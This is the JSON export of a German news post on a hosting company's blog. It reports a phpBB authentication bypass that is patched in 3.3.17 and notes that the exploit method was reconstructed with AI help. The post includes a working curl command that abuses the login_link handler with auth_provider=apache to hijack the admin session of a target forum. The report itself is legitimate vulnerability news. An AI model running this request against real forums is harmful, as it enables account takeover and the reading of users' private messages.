{"id":182030,"date":"2026-06-12T02:48:17","date_gmt":"2026-06-12T00:48:17","guid":{"rendered":"https:\/\/prohoster.info\/blog\/novosti-interneta\/uyazvimost-v-phpbb-pozvolyayushhaya-poluchit-dostup-k-lyubomu-akkauntu-bez-autentifikaczii"},"modified":"2026-06-12T02:48:17","modified_gmt":"2026-06-12T00:48:17","slug":"uyazvimost-v-phpbb-pozvolyayushhaya-poluchit-dostup-k-lyubomu-akkauntu-bez-autentifikaczii","status":"publish","type":"post","link":"https:\/\/prohoster.info\/de\/blog\/news\/uyazvimost-v-phpbb-pozvolyayushhaya-poluchit-dostup-k-lyubomu-akkauntu-bez-autentifikaczii","title":{"rendered":"Eine Schwachstelle in phpBB, die den Zugriff auf jedes Konto ohne Authentifizierung erm\u00f6glicht","gt_translate_keys":[{"key":"rendered","format":"text"}]},"content":{"rendered":"<p>Im Open-Source-Forum-Software phpBB wurde eine Sicherheitsanf\u00e4lligkeit entdeckt, die es erm\u00f6glicht, sich durch das Senden einer einzigen HTTP-Anfrage mit der Sitzung eines beliebigen Forum-Nutzers zu verbinden. Die Schwachstelle tritt in der standardm\u00e4\u00dfigen phpBB-Konfiguration auf. Das Problem wurde in der Version phpBB 3.3.17 behoben.<\/p>\n<p>Bei einem Angriff auf normale Nutzer kann auf private Nachrichten zugegriffen werden und es besteht die M\u00f6glichkeit, Nachrichten im Namen des Nutzers zu senden. Bei einem Angriff auf Moderatoren und Administratoren k\u00f6nnen fremde Nachrichten gel\u00f6scht und <a class=\"wpil_keyword_link\" href=\"https:\/\/prohoster.info\/de\/lir\/ipv4\/\" title=\"IP-Adressen\" data-wpil-keyword-link=\"linked\">IP-Adressen<\/a> E-Mails eingesehen, private Nachrichten gelesen werden, jedoch kann nicht auf das Administrationsinterface zugegriffen werden und kein Zugriff auf den Host erhalten werden. <\/p>\n<p>Es werden keine Einzelheiten zur Schwachstelle angegeben, aber mithilfe von KI wurde bereits eine Exploit-Methode rekonstruiert, die auf den Aufruf des Handlers &#171;login_link&#187; basiert, indem die Authentifizierungsmethode &#171;auth_provider=apache&#187; festgelegt und der Login \u00fcber Basic Auth eingesetzt wird. Danach wird die Umgebungsvariable &#171;PHP_AUTH_USER=Login&#187; von PHP gesetzt, und phpBB extrahiert den Benutzernamen ohne Passwort\u00fcberpr\u00fcfung. Zum Beispiel, um die Sitzungs-ID des Benutzers admin zu erhalten und diese in der Datei cookies.txt zu speichern, kann folgender Code ausgef\u00fchrt werden:<\/p>\n<p>   curl -i -s &#092;<br \/>\n     -c cookies.txt &#092;<br \/>\n     -b cookies.txt &#092;<br \/>\n     -u &#8216;admin:wasauchimmer&#8217; &#092;<br \/>\n     -d &#8216;login=Login&amp;login_username=admin&amp;login_password=wasauchimmer&#8217; &#092;<br \/>\n     &#8216;https:\/\/target.example\/forum\/ucp.php?mode=login_link&amp;auth_provider=apache&amp;login_link_any=1&#8217;<br \/>\n<br \/>Quelle: <a rel=\"nofollow\" href=\"https:\/\/www.opennet.ru\/opennews\/art.shtml?num=65667\">opennet.ru<\/a> <\/p>","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"excerpt":{"rendered":"<p>\u0412 \u0441\u0432\u043e\u0431\u043e\u0434\u043d\u043e\u043c \u0434\u0432\u0438\u0436\u043a\u0435 \u0434\u043b\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0444\u043e\u0440\u0443\u043c\u043e\u0432 phpBB \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0447\u0435\u0440\u0435\u0437 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0443 \u043e\u0434\u043d\u043e\u0433\u043e HTTP-\u0437\u0430\u043f\u0440\u043e\u0441\u0430 \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0438\u0442\u044c\u0441\u044f \u043a \u0441\u0435\u0430\u043d\u0441\u0443 \u043b\u044e\u0431\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0444\u043e\u0440\u0443\u043c\u0430. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0440\u043e\u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0432 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 phpBB \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430 \u0432 \u0432\u0435\u0440\u0441\u0438\u0438 phpBB 3.3.17. \u041f\u0440\u0438 \u0430\u0442\u0430\u043a\u0435 \u043d\u0430 \u043e\u0431\u044b\u0447\u043d\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043f\u0440\u0438\u0432\u0430\u0442\u043d\u043e\u0439 \u043f\u0435\u0440\u0435\u043f\u0438\u0441\u043a\u0435 \u0438 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f. \u041f\u0440\u0438 \u0430\u0442\u0430\u043a\u0435 \u043d\u0430 \u043c\u043e\u0434\u0435\u0440\u0430\u0442\u043e\u0440\u043e\u0432 [&hellip;]<\/p>\n","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"author":8,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[702],"tags":[],"class_list":["post-182030","post","type-post","status-publish","format-standard","hentry","category-news"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 5.0.1.1 - aioseo.com -->\n\t<meta name=\"description\" content=\"\u0412 \u0441\u0432\u043e\u0431\u043e\u0434\u043d\u043e\u043c \u0434\u0432\u0438\u0436\u043a\u0435 \u0434\u043b\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0444\u043e\u0440\u0443\u043c\u043e\u0432 phpBB \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0447\u0435\u0440\u0435\u0437 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0443 \u043e\u0434\u043d\u043e\u0433\u043e HTTP-\u0437\u0430\u043f\u0440\u043e\u0441\u0430 \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0438\u0442\u044c\u0441\u044f \u043a \u0441\u0435\u0430\u043d\u0441\u0443 \u043b\u044e\u0431\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0444\u043e\u0440\u0443\u043c\u0430.\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Erik Peterson\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/prohoster.info\/de\/blog\/news\/uyazvimost-v-phpbb-pozvolyayushhaya-poluchit-dostup-k-lyubomu-akkauntu-bez-autentifikaczii\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 5.0.1.1\" \/>\n\t\t<meta property=\"og:locale\" content=\"de_DE\" \/>\n\t\t<meta property=\"og:site_name\" content=\"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"\ud83e\udd47\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 phpBB, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043b\u044e\u0431\u043e\u043c\u0443 \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u0443 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 | ProHoster\" \/>\n\t\t<meta property=\"og:description\" content=\"\u0412 \u0441\u0432\u043e\u0431\u043e\u0434\u043d\u043e\u043c \u0434\u0432\u0438\u0436\u043a\u0435 \u0434\u043b\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0444\u043e\u0440\u0443\u043c\u043e\u0432 phpBB \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0447\u0435\u0440\u0435\u0437 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0443 \u043e\u0434\u043d\u043e\u0433\u043e HTTP-\u0437\u0430\u043f\u0440\u043e\u0441\u0430 \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0438\u0442\u044c\u0441\u044f \u043a \u0441\u0435\u0430\u043d\u0441\u0443 \u043b\u044e\u0431\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0444\u043e\u0440\u0443\u043c\u0430.\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/prohoster.info\/de\/blog\/news\/uyazvimost-v-phpbb-pozvolyayushhaya-poluchit-dostup-k-lyubomu-akkauntu-bez-autentifikaczii\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:width\" content=\"350\" \/>\n\t\t<meta property=\"og:image:height\" content=\"350\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2026-06-12T00:48:17+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2026-06-12T00:48:17+00:00\" \/>\n\t\t<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"\ud83e\udd47 Sicherheitsanf\u00e4lligkeit in phpBB, die den Zugang zu jedem Konto ohne Authentifizierung erm\u00f6glicht | ProHoster","description":"Im Open-Source-Forum-Software phpBB wurde eine Sicherheitsanf\u00e4lligkeit entdeckt, die es erm\u00f6glicht, sich durch das Senden einer einzigen HTTP-Anfrage mit der Sitzung eines beliebigen Forum-Nutzers zu verbinden.","canonical_url":"https:\/\/prohoster.info\/de\/blog\/news\/uyazvimost-v-phpbb-pozvolyayushhaya-poluchit-dostup-k-lyubomu-akkauntu-bez-autentifikaczii","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":null,"og:locale":"de_DE","og:site_name":"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b","og:type":"article","og:title":"\ud83e\udd47\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 phpBB, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043b\u044e\u0431\u043e\u043c\u0443 \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u0443 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 | ProHoster","og:description":"\u0412 \u0441\u0432\u043e\u0431\u043e\u0434\u043d\u043e\u043c \u0434\u0432\u0438\u0436\u043a\u0435 \u0434\u043b\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0444\u043e\u0440\u0443\u043c\u043e\u0432 phpBB \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0447\u0435\u0440\u0435\u0437 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0443 \u043e\u0434\u043d\u043e\u0433\u043e HTTP-\u0437\u0430\u043f\u0440\u043e\u0441\u0430 \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0438\u0442\u044c\u0441\u044f \u043a \u0441\u0435\u0430\u043d\u0441\u0443 \u043b\u044e\u0431\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0444\u043e\u0440\u0443\u043c\u0430.","og:url":"https:\/\/prohoster.info\/de\/blog\/news\/uyazvimost-v-phpbb-pozvolyayushhaya-poluchit-dostup-k-lyubomu-akkauntu-bez-autentifikaczii","og:image":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:secure_url":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:width":350,"og:image:height":350,"article:published_time":"2026-06-12T00:48:17+00:00","article:modified_time":"2026-06-12T00:48:17+00:00","article:publisher":"https:\/\/www.facebook.com\/prohoster","article:author":"https:\/\/www.facebook.com\/prohoster"},"aioseo_meta_data":[],"gt_translate_keys":[{"key":"link","format":"url"}],"_links":{"self":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/posts\/182030","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/users\/8"}],"replies":[{"embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/comments?post=182030"}],"version-history":[{"count":1,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/posts\/182030\/revisions"}],"predecessor-version":[{"id":182073,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/posts\/182030\/revisions\/182073"}],"wp:attachment":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/media?parent=182030"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/categories?post=182030"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/tags?post=182030"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}